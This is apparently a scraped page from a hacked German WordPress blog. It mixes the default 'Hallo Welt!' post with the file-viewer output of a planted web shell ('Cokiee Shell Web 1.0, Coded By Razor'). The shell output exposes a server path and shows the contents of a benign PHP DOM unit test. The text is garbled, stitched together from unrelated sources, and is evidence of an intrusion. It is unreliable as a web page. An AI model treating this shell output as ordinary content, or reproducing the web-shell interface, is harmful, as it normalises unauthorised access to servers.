Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/dom/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/dom/tests/DOMDocument_createAttribute_basic.phpt |
--TEST-- DomDocument::createAttribute() - basic test for DomDocument::createAttribute() --CREDITS-- Muhammad Khalid Adnan # TestFest 2008 --SKIPIF-- <?php require_once('skipif.inc'); ?> --FILE-- <?php $doc = new DOMDocument; $node = $doc->createElement("para"); $newnode = $doc->appendChild($node); // A pass case. $test_attribute = $doc->createAttribute("hahaha"); $node->appendChild($test_attribute); echo $doc->saveXML(); ?> --EXPECT-- <?xml version="1.0"?> <para hahaha=""/>
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare